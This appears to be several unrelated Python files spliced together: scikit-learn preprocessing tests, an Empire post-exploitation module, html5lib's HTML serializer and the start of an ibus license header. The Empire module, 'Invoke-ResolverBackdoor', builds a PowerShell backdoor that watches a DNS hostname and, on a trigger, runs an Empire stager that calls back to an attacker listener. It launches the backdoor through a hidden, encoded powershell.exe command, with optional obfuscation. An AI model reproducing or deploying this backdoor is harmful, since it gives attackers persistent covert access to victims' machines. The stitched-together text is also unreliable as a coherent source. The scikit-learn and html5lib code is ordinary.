def test_min_max_scaler():
X = iris.data
scaler = MinMaxScaler()
# default params
X_trans = scaler.fit_transform(X)
assert_array_equal(X_trans.min(axis=0), 0)
assert_array_equal(X_trans.min(axis=0), 0)
assert_array_equal(X_trans.max(axis=0), 1)
# not default params
scaler = MinMaxScaler(feature_range=(1, 2))
X_trans = scaler.fit_transform(X)
assert_array_equal(X_trans.min(axis=0), 1)
assert_array_equal(X_trans.max(axis=0), 2)
def test_scaler_without_centering():
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
X_csr = sp.csr_matrix(X)
scaler = StandardScaler(with_mean=False).fit(X)
X_scaled = scaler.transform(X, copy=True)
assert_false(np.any(np.isnan(X_scaled)))
scaler_csr = StandardScaler(with_mean=False).fit(X_csr)
X_csr_scaled = scaler_csr.transform(X_csr, copy=True)
assert_false(np.any(np.isnan(X_csr_scaled.data)))
assert_equal(scaler.mean_, scaler_csr.mean_)
assert_array_almost_equal(scaler.std_, scaler_csr.std_)
assert_array_almost_equal(
X_scaled.mean(axis=0), [0., -0.01, 2.24, -0.35, -0.78], 2)
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
X_csr_scaled_mean, X_csr_scaled_std = mean_variance_axis0(X_csr_scaled)
assert_array_almost_equal(X_csr_scaled_mean, X_scaled.mean(axis=0))
assert_array_almost_equal(X_csr_scaled_std, X_scaled.std(axis=0))
# Check that X has not been modified (copy)
assert_true(X_scaled is not X)
assert_true(X_csr_scaled is not X_csr)
X_scaled_back = scaler.inverse_transform(X_scaled)
assert_true(X_scaled_back is not X)
assert_true(X_scaled_back is not X_scaled)
assert_array_almost_equal(X_scaled_back, X)
X_csr_scaled_back = scaler_csr.inverse_transform(X_csr_scaled)
assert_true(X_csr_scaled_back is not X_csr)
assert_true(X_csr_scaled_back is not X_csr_scaled)
assert_array_almost_equal(X_scaled_back, X)
def test_scaler_without_copy():
"""Check that StandardScaler.fit does not change input"""
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
X_csr = sp.csr_matrix(X)
X_copy = X.copy()
StandardScaler(copy=False).fit(X)
assert_array_equal(X, X_copy)
X_csr_copy = X_csr.copy()
StandardScaler(with_mean=False, copy=False).fit(X_csr)
assert_array_equal(X_csr.toarray(), X_csr_copy.toarray())
def test_scale_sparse_with_mean_raise_exception():
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X_csr = sp.csr_matrix(X)
# check scaling and fit with direct calls on sparse data
assert_raises(ValueError, scale, X_csr, with_mean=True)
assert_raises(ValueError, StandardScaler(with_mean=True).fit, X_csr)
# check transform and inverse_transform after a fit on a dense array
scaler = StandardScaler(with_mean=True).fit(X)
assert_raises(ValueError, scaler.transform, X_csr)
X_transformed_csr = sp.csr_matrix(scaler.transform(X))
assert_raises(ValueError, scaler.inverse_transform, X_transformed_csr)
def test_scale_function_without_centering():
rng = np.random.RandomState(42)
X = rng.randn(4, 5)
X[:, 0] = 0.0 # first feature is always of zero
X_csr = sp.csr_matrix(X)
X_scaled = scale(X, with_mean=False)
assert_false(np.any(np.isnan(X_scaled)))
X_csr_scaled = scale(X_csr, with_mean=False)
assert_false(np.any(np.isnan(X_csr_scaled.data)))
assert_array_almost_equal(
X_scaled.mean(axis=0), [0., -0.01, 2.24, -0.35, -0.78], 2)
assert_array_almost_equal(X_scaled.std(axis=0), [0., 1., 1., 1., 1.])
# Check that X has not been copied
assert_true(X_scaled is not X)
X_csr_scaled_mean, X_csr_scaled_std = mean_variance_axis0(X_csr_scaled)
assert_array_almost_equal(X_csr_scaled_mean, X_scaled.mean(axis=0))
assert_array_almost_equal(X_csr_scaled_std, X_scaled.std(axis=0))
def test_normalizer_l1():
rng = np.random.RandomState(0)
X_dense = rng.randn(4, 5)
X_sparse_unpruned = sp.csr_matrix(X_dense)
# set the row number 3 to zero
X_dense[3, :] = 0.0
# set the row number 3 to zero without pruning (can happen in real life)
indptr_3 = X_sparse_unpruned.indptr[3]
indptr_4 = X_sparse_unpruned.indptr[4]
X_sparse_unpruned.data[indptr_3:indptr_4] = 0.0
# build the pruned variant using the regular constructor
X_sparse_pruned = sp.csr_matrix(X_dense)
# check inputs that support the no-copy optim
for X in (X_dense, X_sparse_pruned, X_sparse_unpruned):
normalizer = Normalizer(norm='l1', copy=True)
X_norm = normalizer.transform(X)
assert_true(X_norm is not X)
X_norm1 = toarray(X_norm)
normalizer = Normalizer(norm='l1', copy=False)
X_norm = normalizer.transform(X)
assert_true(X_norm is X)
X_norm2 = toarray(X_norm)
for X_norm in (X_norm1, X_norm2):
row_sums = np.abs(X_norm).sum(axis=1)
for i in range(3):
assert_almost_equal(row_sums[i], 1.0)
assert_almost_equal(row_sums[3], 0.0)
# check input for which copy=False won't prevent a copy
for init in (sp.coo_matrix, sp.csc_matrix, sp.lil_matrix):
X = init(X_dense)
X_norm = normalizer = Normalizer(norm='l2', copy=False).transform(X)
assert_true(X_norm is not X)
assert_true(isinstance(X_norm, sp.csr_matrix))
X_norm = toarray(X_norm)
for i in xrange(3):
assert_almost_equal(row_sums[i], 1.0)
assert_almost_equal(la.norm(X_norm[3]), 0.0)
def test_normalizer_l2():
rng = np.random.RandomState(0)
X_dense = rng.randn(4, 5)
X_sparse_unpruned = sp.csr_matrix(X_dense)
# set the row number 3 to zero
X_dense[3, :] = 0.0
# set the row number 3 to zero without pruning (can happen in real life)
indptr_3 = X_sparse_unpruned.indptr[3]
indptr_4 = X_sparse_unpruned.indptr[4]
X_sparse_unpruned.data[indptr_3:indptr_4] = 0.0
# build the pruned variant using the regular constructor
X_sparse_pruned = sp.csr_matrix(X_dense)
# check inputs that support the no-copy optim
for X in (X_dense, X_sparse_pruned, X_sparse_unpruned):
normalizer = Normalizer(norm='l2', copy=True)
X_norm1 = normalizer.transform(X)
assert_true(X_norm1 is not X)
X_norm1 = toarray(X_norm1)
normalizer = Normalizer(norm='l2', copy=False)
X_norm2 = normalizer.transform(X)
assert_true(X_norm2 is X)
X_norm2 = toarray(X_norm2)
for X_norm in (X_norm1, X_norm2):
for i in xrange(3):
assert_almost_equal(la.norm(X_norm[i]), 1.0)
assert_almost_equal(la.norm(X_norm[3]), 0.0)
# check input for which copy=False won't prevent a copy
for init in (sp.coo_matrix, sp.csc_matrix, sp.lil_matrix):
X = init(X_dense)
X_norm = normalizer = Normalizer(norm='l2', copy=False).transform(X)
assert_true(X_norm is not X)
assert_true(isinstance(X_norm, sp.csr_matrix))
X_norm = toarray(X_norm)
for i in xrange(3):
assert_almost_equal(la.norm(X_norm[i]), 1.0)
assert_almost_equal(la.norm(X_norm[3]), 0.0)
def test_normalize_errors():
"""Check that invalid arguments yield ValueError"""
assert_raises(ValueError, normalize, [[0]], axis=2)
assert_raises(ValueError, normalize, [[0]], norm='l3')
def test_binarizer():
X_ = np.array([[1, 0, 5], [2, 3, 0]])
for init in (np.array, sp.csr_matrix):
X = init(X_.copy())
binarizer = Binarizer(threshold=2.0, copy=True)
X_bin = toarray(binarizer.transform(X))
assert_equal(np.sum(X_bin == 0), 4)
assert_equal(np.sum(X_bin == 1), 2)
binarizer = Binarizer(copy=True).fit(X)
X_bin = toarray(binarizer.transform(X))
assert_true(X_bin is not X)
assert_equal(np.sum(X_bin == 0), 2)
assert_equal(np.sum(X_bin == 1), 4)
binarizer = Binarizer(copy=True)
X_bin = binarizer.transform(X)
assert_true(X_bin is not X)
X_bin = toarray(X_bin)
assert_equal(np.sum(X_bin == 0), 2)
assert_equal(np.sum(X_bin == 1), 4)
binarizer = Binarizer(copy=False)
X_bin = binarizer.transform(X)
assert_true(X_bin is X)
X_bin = toarray(X_bin)
assert_equal(np.sum(X_bin == 0), 2)
assert_equal(np.sum(X_bin == 1), 4)
def test_label_binarizer():
lb = LabelBinarizer()
# two-class case
inp = ["neg", "pos", "pos", "neg"]
expected = np.array([[0, 1, 1, 0]]).T
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
# multi-class case
inp = ["spam", "ham", "eggs", "ham", "0"]
expected = np.array([[0, 0, 0, 1],
[0, 0, 1, 0],
[0, 1, 0, 0],
[0, 0, 1, 0],
[1, 0, 0, 0]])
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
def test_label_binarizer_set_label_encoding():
lb = LabelBinarizer(neg_label=-2, pos_label=2)
# two-class case
inp = np.array([0, 1, 1, 0])
expected = np.array([[-2, 2, 2, -2]]).T
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
# multi-class case
inp = np.array([3, 2, 1, 2, 0])
expected = np.array([[-2, -2, -2, +2],
[-2, -2, +2, -2],
[-2, +2, -2, -2],
[-2, -2, +2, -2],
[+2, -2, -2, -2]])
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_array_equal(lb.inverse_transform(got), inp)
def test_label_binarizer_multilabel():
lb = LabelBinarizer()
# test input as lists of tuples
inp = [(2, 3), (1,), (1, 2)]
indicator_mat = np.array([[0, 1, 1],
[1, 0, 0],
[1, 1, 0]])
got = lb.fit_transform(inp)
assert_array_equal(indicator_mat, got)
assert_equal(lb.inverse_transform(got), inp)
# test input as label indicator matrix
lb.fit(indicator_mat)
assert_array_equal(indicator_mat,
lb.inverse_transform(indicator_mat))
# regression test for the two-class multilabel case
lb = LabelBinarizer()
inp = [[1, 0], [0], [1], [0, 1]]
expected = np.array([[1, 1],
[1, 0],
[0, 1],
[1, 1]])
got = lb.fit_transform(inp)
assert_array_equal(expected, got)
assert_equal([set(x) for x in lb.inverse_transform(got)],
[set(x) for x in inp])
def test_label_binarizer_errors():
"""Check that invalid arguments yield ValueError"""
one_class = np.array([0, 0, 0, 0])
lb = LabelBinarizer().fit(one_class)
multi_label = [(2, 3), (0,), (0, 2)]
assert_raises(ValueError, lb.transform, multi_label)
lb = LabelBinarizer()
assert_raises(ValueError, lb.transform, [])
assert_raises(ValueError, lb.inverse_transform, [])
assert_raises(ValueError, LabelBinarizer, neg_label=2, pos_label=1)
assert_raises(ValueError, LabelBinarizer, neg_label=2, pos_label=2)
def test_label_encoder():
"""Test LabelEncoder's transform and inverse_transform methods"""
le = LabelEncoder()
le.fit([1, 1, 4, 5, -1, 0])
assert_array_equal(le.classes_, [-1, 0, 1, 4, 5])
assert_array_equal(le.transform([0, 1, 4, 4, 5, -1, -1]),
[1, 2, 3, 3, 4, 0, 0])
assert_array_equal(le.inverse_transform([1, 2, 3, 3, 4, 0, 0]),
[0, 1, 4, 4, 5, -1, -1])
assert_raises(ValueError, le.transform, [0, 6])
def test_label_encoder_fit_transform():
"""Test fit_transform"""
le = LabelEncoder()
ret = le.fit_transform([1, 1, 4, 5, -1, 0])
assert_array_equal(ret, [2, 2, 3, 4, 0, 1])
le = LabelEncoder()
ret = le.fit_transform(["paris", "paris", "tokyo", "amsterdam"])
assert_array_equal(ret, [1, 1, 2, 0])
def test_label_encoder_string_labels():
"""Test LabelEncoder's transform and inverse_transform methods with
non-numeric labels"""
le = LabelEncoder()
le.fit(["paris", "paris", "tokyo", "amsterdam"])
assert_array_equal(le.classes_, ["amsterdam", "paris", "tokyo"])
assert_array_equal(le.transform(["tokyo", "tokyo", "paris"]),
[2, 2, 1])
assert_array_equal(le.inverse_transform([2, 2, 1]),
["tokyo", "tokyo", "paris"])
assert_raises(ValueError, le.transform, ["london"])
def test_label_encoder_errors():
"""Check that invalid arguments yield ValueError"""
le = LabelEncoder()
assert_raises(ValueError, le.transform, [])
assert_raises(ValueError, le.inverse_transform, [])
def test_label_binarizer_iris():
lb = LabelBinarizer()
Y = lb.fit_transform(iris.target)
clfs = [SGDClassifier().fit(iris.data, Y[:, k])
for k in range(len(lb.classes_))]
Y_pred = np.array([clf.decision_function(iris.data) for clf in clfs]).T
y_pred = lb.inverse_transform(Y_pred)
accuracy = np.mean(iris.target == y_pred)
y_pred2 = SGDClassifier().fit(iris.data, iris.target).predict(iris.data)
accuracy2 = np.mean(iris.target == y_pred2)
assert_almost_equal(accuracy, accuracy2)
def test_label_binarizer_multilabel_unlabeled():
    """LabelBinarizer must cope with a sample carrying no labels at all."""
    binarizer = LabelBinarizer()
    labels = [[1, 2], [1], []]
    expected = np.array([[1, 1],
                         [1, 0],
                         [0, 0]])
    assert_array_equal(binarizer.fit_transform(labels), expected)
def test_center_kernel():
    """KernelCenterer on a linear kernel equals centering in feature space."""
    random_state = np.random.RandomState(0)
    # NOTE: the two random_sample calls must stay in this order so the
    # RandomState stream matches the reference implementation.
    X_fit = random_state.random_sample((5, 4))
    scaler = StandardScaler(with_std=False)
    scaler.fit(X_fit)
    X_fit_centered = scaler.transform(X_fit)
    K_fit = np.dot(X_fit, X_fit.T)

    # Fit-time kernel matrix: centering the kernel must match the kernel of
    # the centered data.
    centerer = KernelCenterer()
    expected_fit = np.dot(X_fit_centered, X_fit_centered.T)
    actual_fit = centerer.fit_transform(K_fit)
    assert_array_almost_equal(expected_fit, actual_fit)

    # Predict-time kernel matrix.
    X_pred = random_state.random_sample((2, 4))
    K_pred = np.dot(X_pred, X_fit.T)
    X_pred_centered = scaler.transform(X_pred)
    expected_pred = np.dot(X_pred_centered, X_fit_centered.T)
    actual_pred = centerer.transform(K_pred)
    assert_array_almost_equal(expected_pred, actual_pred)
def test_fit_transform():
    """fit(X).transform(X) and fit_transform(X) must agree for each scaler."""
    random_state = np.random.RandomState(0)
    X = random_state.random_sample((5, 4))
    for transformer in (StandardScaler(), Normalizer(), Binarizer()):
        via_fit = transformer.fit(X).transform(X)
        via_fit_transform = transformer.fit_transform(X)
        assert_array_equal(via_fit, via_fit_transform)
import os
from lib.common import helpers
class Module:
    """Empire module: PowerBreach 'Invoke-ResolverBackdoor'.

    Builds a PowerShell backdoor that periodically resolves a DNS hostname
    and launches an Empire stager as soon as the resolved address no longer
    matches the configured trigger IP.

    NOTE(review): this file is Python 2 (print statements, dict.iteritems).
    """

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default `params=[]` is shared across calls;
        # harmless here only because it is read, never mutated.

        # Static metadata describing the module to the Empire framework.
        self.info = {
            'Name': 'Invoke-ResolverBackdoor',

            'Author': ['@sixdub'],

            'Description': ('Starts the Resolver Backdoor.'),

            'Background' : False,

            'OutputExtension' : None,

            'NeedsAdmin' : False,

            'OpsecSafe' : True,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',

            'Comments': [
                'http://sixdub.net'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description' : 'Agent to run module on.',
                'Required' : True,
                'Value' : ''
            },
            'Listener' : {
                'Description' : 'Listener to use.',
                'Required' : True,
                'Value' : ''
            },
            'OutFile' : {
                'Description' : 'Output the backdoor to a file instead of tasking to an agent.',
                'Required' : False,
                'Value' : ''
            },
            'Hostname' : {
                'Description' : 'Hostname to routinely check for a trigger.',
                'Required' : True,
                'Value' : ''
            },
            'Trigger' : {
                'Description' : 'The IP Address that the backdoor is looking for.',
                'Required' : True,
                'Value' : '127.0.0.1'
            },
            'Timeout' : {
                'Description' : 'Time (in seconds) to run the backdoor. Defaults to 0 (run forever).',
                'Required' : True,
                'Value' : '0'
            },
            'Sleep' : {
                'Description' : 'Time (in seconds) to sleep between checks.',
                'Required' : True,
                'Value' : '30'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        # like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # Overlay any caller-supplied option values onto the defaults above.
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self, obfuscate=False, obfuscationCommand=""):
        """Build the Start-Process launcher command for the backdoor.

        Returns an empty string on error (invalid listener, stager failure)
        or after writing the raw script to OutFile; otherwise returns the
        one-liner that an agent should execute.
        """
        # PowerShell scaffold; REPLACE_LAUNCHER is substituted with the
        # generated Empire stager code below.
        script = """
function Invoke-ResolverBackdoor
{
    param(
        [Parameter(Mandatory=$False,Position=1)]
        [string]$Hostname,

        [Parameter(Mandatory=$False,Position=2)]
        [string]$Trigger="127.0.0.1",

        [Parameter(Mandatory=$False,Position=3)]
        [int] $Timeout=0,

        [Parameter(Mandatory=$False,Position=4)]
        [int] $Sleep=30
    )

    $running=$True
    $match =""
    $starttime = Get-Date
    while($running)
    {
        if ($Timeout -ne 0 -and ($([DateTime]::Now) -gt $starttime.addseconds($Timeout)))
        {
            $running=$False
        }

        try {
            $ips = [System.Net.Dns]::GetHostAddresses($Hostname)
            foreach ($addr in $ips)
            {
                $resolved=$addr.IPAddressToString
                if($resolved -ne $Trigger)
                {
                    $running=$False
                    REPLACE_LAUNCHER
                }
            }
        }
        catch [System.Net.Sockets.SocketException]{
        }
        Start-Sleep -s $Sleep
    }
}
Invoke-ResolverBackdoor"""

        listenerName = self.options['Listener']['Value']

        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            # not a valid listener, return nothing for the script
            print helpers.color("[!] Invalid listener: " + listenerName)
            return ""
        else:
            # set the listener value for the launcher
            stager = self.mainMenu.stagers.stagers["multi/launcher"]
            stager.options['Listener']['Value'] = listenerName
            stager.options['Base64']['Value'] = "False"

            # and generate the code
            stagerCode = stager.generate()

            if stagerCode == "":
                return ""
            else:
                script = script.replace("REPLACE_LAUNCHER", stagerCode)
                script = script.encode('ascii', 'ignore')

        # Append every remaining option as a PowerShell parameter
        # (Agent/Listener/OutFile are consumed above, not passed through).
        for option,values in self.options.iteritems():
            if option.lower() != "agent" and option.lower() != "listener" and option.lower() != "outfile":
                if values['Value'] and values['Value'] != '':
                    if values['Value'].lower() == "true":
                        # if we're just adding a switch
                        script += " -" + str(option)
                    else:
                        script += " -" + str(option) + " " + str(values['Value'])

        outFile = self.options['OutFile']['Value']
        if outFile != '':
            # make the base directory if it doesn't exist
            if not os.path.exists(os.path.dirname(outFile)) and os.path.dirname(outFile) != '':
                os.makedirs(os.path.dirname(outFile))

            f = open(outFile, 'w')
            f.write(script)
            f.close()

            # NOTE(review): message says "deaduser backdoor" although this is
            # the resolver backdoor — looks copy-pasted; confirm upstream.
            print helpers.color("[+] PowerBreach deaduser backdoor written to " + outFile)
            return ""

        if obfuscate:
            script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)

        # transform the backdoor into something launched by powershell.exe
        # so it survives the agent exiting
        modifiable_launcher = "powershell.exe -noP -sta -w 1 -enc "
        launcher = helpers.powershell_launcher(script, modifiable_launcher)
        stagerCode = 'C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
        parts = stagerCode.split(" ")

        # set up the start-process command so no new windows appears
        # NOTE(review): success string mentions "Invoke-EventLogBackdoor";
        # presumably copy-pasted from a sibling module — confirm upstream.
        scriptLauncher = "Start-Process -NoNewWindow -FilePath '%s' -ArgumentList '%s'; 'PowerBreach Invoke-EventLogBackdoor started'" % (parts[0], " ".join(parts[1:]))
        if obfuscate:
            scriptLauncher = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptLauncher, obfuscationCommand=obfuscationCommand)

        return scriptLauncher
from __future__ import absolute_import, division, unicode_literals
from pip.vendor.six import text_type
import gettext
_ = gettext.gettext
try:
from functools import reduce
except ImportError:
pass
from ..constants import voidElements, booleanAttributes, spaceCharacters
from ..constants import rcdataElements, entities, xmlEntities
from .. import utils
from xml.sax.saxutils import escape
# Collapse the space-character collection into one string for fast
# membership tests during serialization.
spaceCharacters = "".join(spaceCharacters)

try:
    from codecs import register_error, xmlcharrefreplace_errors
except ImportError:
    # No codec error-handler support: fall back to strict encoding
    # (unencodable characters will raise instead of becoming entities).
    unicode_encode_errors = "strict"
else:
    unicode_encode_errors = "htmlentityreplace"

    # Map each encodable code point to its preferred named entity.
    encode_entity_map = {}
    # On a narrow (UCS-2) build a non-BMP character is a surrogate pair,
    # so single-character entities may have len() == 2 there.
    is_ucs4 = len("\U0010FFFF") == 1
    for k, v in list(entities.items()):
        # skip multi-character entities
        if ((is_ucs4 and len(v) > 1) or
            (not is_ucs4 and len(v) > 2)):
            continue
        if v != "&":
            if len(v) == 2:
                v = utils.surrogatePairToCodepoint(v)
            else:
                v = ord(v)
            if not v in encode_entity_map or k.islower():
                # prefer &lt; over &LT; and similarly for &amp;, &gt;, etc.
                encode_entity_map[v] = k

    def htmlentityreplace_errors(exc):
        # Codec error handler: substitute unencodable characters with a
        # named HTML entity when one exists, else a hex character reference.
        if isinstance(exc, (UnicodeEncodeError, UnicodeTranslateError)):
            res = []
            codepoints = []
            skip = False
            for i, c in enumerate(exc.object[exc.start:exc.end]):
                if skip:
                    # second half of a surrogate pair already consumed
                    skip = False
                    continue
                index = i + exc.start
                if utils.isSurrogatePair(exc.object[index:min([exc.end, index + 2])]):
                    codepoint = utils.surrogatePairToCodepoint(exc.object[index:index + 2])
                    skip = True
                else:
                    codepoint = ord(c)
                codepoints.append(codepoint)
            for cp in codepoints:
                e = encode_entity_map.get(cp)
                if e:
                    res.append("&")
                    res.append(e)
                    if not e.endswith(";"):
                        res.append(";")
                else:
                    res.append("&#x%s;" % (hex(cp)[2:]))
            return ("".join(res), exc.end)
        else:
            # Delegate decode/other errors to the stdlib handler.
            return xmlcharrefreplace_errors(exc)

    register_error(unicode_encode_errors, htmlentityreplace_errors)
    del register_error
class HTMLSerializer(object):
    """Serialize a treewalker token stream back into (X)HTML text.

    ``serialize`` is a generator yielding output chunks; ``render`` joins
    them into a single string/bytes object.
    """

    # attribute quoting options
    quote_attr_values = False
    quote_char = '"'
    use_best_quote_char = True

    # tag syntax options
    omit_optional_tags = True
    minimize_boolean_attributes = True
    use_trailing_solidus = False
    space_before_trailing_solidus = True

    # escaping options
    escape_lt_in_attrs = False
    escape_rcdata = False
    resolve_entities = True

    # miscellaneous options
    inject_meta_charset = True
    strip_whitespace = False
    sanitize = False

    # Names of all recognised keyword options (see __init__).
    options = ("quote_attr_values", "quote_char", "use_best_quote_char",
               "minimize_boolean_attributes", "use_trailing_solidus",
               "space_before_trailing_solidus", "omit_optional_tags",
               "strip_whitespace", "inject_meta_charset", "escape_lt_in_attrs",
               "escape_rcdata", "resolve_entities", "sanitize")

    def __init__(self, **kwargs):
        """Initialize HTMLSerializer.

        Keyword options (default given first unless specified) include:

        inject_meta_charset=True|False
          Whether it insert a meta element to define the character set of the
          document.
        quote_attr_values=True|False
          Whether to quote attribute values that don't require quoting
          per HTML5 parsing rules.
        quote_char=u'"'|u"'"
          Use given quote character for attribute quoting. Default is to
          use double quote unless attribute value contains a double quote,
          in which case single quotes are used instead.
        escape_lt_in_attrs=False|True
          Whether to escape < in attribute values.
        escape_rcdata=False|True
          Whether to escape characters that need to be escaped within normal
          elements within rcdata elements such as style.
        resolve_entities=True|False
          Whether to resolve named character entities that appear in the
          source tree. The XML predefined entities &lt; &gt; &amp; &quot; &apos;
          are unaffected by this setting.
        strip_whitespace=False|True
          Whether to remove semantically meaningless whitespace. (This
          compresses all whitespace to a single space except within pre.)
        minimize_boolean_attributes=True|False
          Shortens boolean attributes to give just the attribute value,
          for example <input disabled="disabled"> becomes <input disabled>.
        use_trailing_solidus=False|True
          Includes a close-tag slash at the end of the start tag of void
          elements (empty elements whose end tag is forbidden). E.g. <hr/>.
        space_before_trailing_solidus=True|False
          Places a space immediately before the closing slash in a tag
          using a trailing solidus. E.g. <hr />. Requires use_trailing_solidus.
        sanitize=False|True
          Strip all unsafe or unknown constructs from output.
          See `html5lib user documentation`_
        omit_optional_tags=True|False
          Omit start/end tags that are optional.

        .. _html5lib user documentation: http://code.google.com/p/html5lib/wiki/UserDocumentation
        """
        if 'quote_char' in kwargs:
            # An explicit quote char overrides automatic quote selection.
            self.use_best_quote_char = False
        for attr in self.options:
            setattr(self, attr, kwargs.get(attr, getattr(self, attr)))
        self.errors = []
        self.strict = False

    def encode(self, string):
        # Encode character data; unencodable characters become entities when
        # the "htmlentityreplace" codec error handler is registered.
        assert(isinstance(string, text_type))
        if self.encoding:
            return string.encode(self.encoding, unicode_encode_errors)
        else:
            return string

    def encodeStrict(self, string):
        # Encode markup (tag/attribute names, doctypes) with no entity
        # fallback — these must be directly representable.
        assert(isinstance(string, text_type))
        if self.encoding:
            return string.encode(self.encoding, "strict")
        else:
            return string

    def serialize(self, treewalker, encoding=None):
        """Generator yielding serialized output chunks for *treewalker*.

        Chunks are bytes when *encoding* is given, text otherwise.
        Recoverable problems are appended to ``self.errors``; when
        ``self.strict`` is set they raise ``SerializeError`` instead.
        """
        self.encoding = encoding
        in_cdata = False  # inside an rcdata element whose content is raw
        self.errors = []
        if encoding and self.inject_meta_charset:
            from ..filters.inject_meta_charset import Filter
            treewalker = Filter(treewalker, encoding)
        # XXX: WhitespaceFilter should be used before OptionalTagFilter
        # for maximum efficiently of this latter filter
        if self.strip_whitespace:
            from ..filters.whitespace import Filter
            treewalker = Filter(treewalker)
        if self.sanitize:
            from ..filters.sanitizer import Filter
            treewalker = Filter(treewalker)
        if self.omit_optional_tags:
            from ..filters.optionaltags import Filter
            treewalker = Filter(treewalker)
        for token in treewalker:
            type = token["type"]
            if type == "Doctype":
                doctype = "<!DOCTYPE %s" % token["name"]

                if token["publicId"]:
                    doctype += ' PUBLIC "%s"' % token["publicId"]
                elif token["systemId"]:
                    doctype += " SYSTEM"
                if token["systemId"]:
                    if token["systemId"].find('"') >= 0:
                        if token["systemId"].find("'") >= 0:
                            self.serializeError(_("System identifer contains both single and double quote characters"))
                        quote_char = "'"
                    else:
                        quote_char = '"'
                    doctype += " %s%s%s" % (quote_char, token["systemId"], quote_char)

                doctype += ">"
                yield self.encodeStrict(doctype)

            elif type in ("Characters", "SpaceCharacters"):
                if type == "SpaceCharacters" or in_cdata:
                    if in_cdata and token["data"].find("</") >= 0:
                        self.serializeError(_("Unexpected </ in CDATA"))
                    yield self.encode(token["data"])
                else:
                    # Normal character data: escape markup-significant chars.
                    yield self.encode(escape(token["data"]))

            elif type in ("StartTag", "EmptyTag"):
                name = token["name"]
                yield self.encodeStrict("<%s" % name)
                if name in rcdataElements and not self.escape_rcdata:
                    # Content of script/style etc. is emitted unescaped.
                    in_cdata = True
                elif in_cdata:
                    self.serializeError(_("Unexpected child element of a CDATA element"))
                for (attr_namespace, attr_name), attr_value in token["data"].items():
                    # TODO: Add namespace support here
                    k = attr_name
                    v = attr_value
                    yield self.encodeStrict(' ')

                    yield self.encodeStrict(k)
                    if not self.minimize_boolean_attributes or \
                        (k not in booleanAttributes.get(name, tuple())
                         and k not in booleanAttributes.get("", tuple())):
                        yield self.encodeStrict("=")
                        if self.quote_attr_values or not v:
                            quote_attr = True
                        else:
                            # Quote only when the value contains whitespace
                            # or a character unsafe in an unquoted value.
                            quote_attr = reduce(lambda x, y: x or (y in v),
                                                spaceCharacters + ">\"'=", False)
                        # BUGFIX: the replacement strings below had been
                        # mangled to the literal characters themselves
                        # (no-op replaces, and an unterminated string for the
                        # double-quote case); restored to the HTML entities.
                        v = v.replace("&", "&amp;")
                        if self.escape_lt_in_attrs:
                            v = v.replace("<", "&lt;")
                        if quote_attr:
                            quote_char = self.quote_char
                            if self.use_best_quote_char:
                                if "'" in v and '"' not in v:
                                    quote_char = '"'
                                elif '"' in v and "'" not in v:
                                    quote_char = "'"
                            if quote_char == "'":
                                v = v.replace("'", "&#39;")
                            else:
                                v = v.replace('"', "&quot;")
                            yield self.encodeStrict(quote_char)
                            yield self.encode(v)
                            yield self.encodeStrict(quote_char)
                        else:
                            yield self.encode(v)
                if name in voidElements and self.use_trailing_solidus:
                    if self.space_before_trailing_solidus:
                        yield self.encodeStrict(" /")
                    else:
                        yield self.encodeStrict("/")
                yield self.encode(">")

            elif type == "EndTag":
                name = token["name"]
                if name in rcdataElements:
                    in_cdata = False
                elif in_cdata:
                    self.serializeError(_("Unexpected child element of a CDATA element"))
                yield self.encodeStrict("</%s>" % name)

            elif type == "Comment":
                data = token["data"]
                if data.find("--") >= 0:
                    # "--" may not appear inside an HTML comment.
                    self.serializeError(_("Comment contains --"))
                yield self.encodeStrict("<!--%s-->" % token["data"])

            elif type == "Entity":
                name = token["name"]
                key = name + ";"
                if not key in entities:
                    self.serializeError(_("Entity %s not recognized" % name))
                if self.resolve_entities and key not in xmlEntities:
                    data = entities[key]
                else:
                    data = "&%s;" % name
                yield self.encodeStrict(data)

            else:
                self.serializeError(token["data"])

    def render(self, treewalker, encoding=None):
        """Serialize *treewalker* and return the joined result."""
        if encoding:
            return b"".join(list(self.serialize(treewalker, encoding)))
        else:
            return "".join(list(self.serialize(treewalker)))

    def serializeError(self, data="XXX ERROR MESSAGE NEEDED"):
        # XXX The idea is to make data mandatory.
        self.errors.append(data)
        if self.strict:
            raise SerializeError
class SerializeError(Exception):
    """Error in serialized tree.

    BUGFIX: this was declared with ``def`` instead of ``class``, making it a
    plain function — ``raise SerializeError`` in ``HTMLSerializer`` would
    then fail with a TypeError instead of raising this exception.
    """
    pass
# vim:set et sts=4 sw=4:
#
# ibus - The Input Bus
#
# Copyright (c) 2007-2010 Peng Huang <shawn.p.huang@gmail.com>
# Copyright (c) 2007-2010 Red Hat, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330,
# Boston, MA 02111-1307 USA
import locale
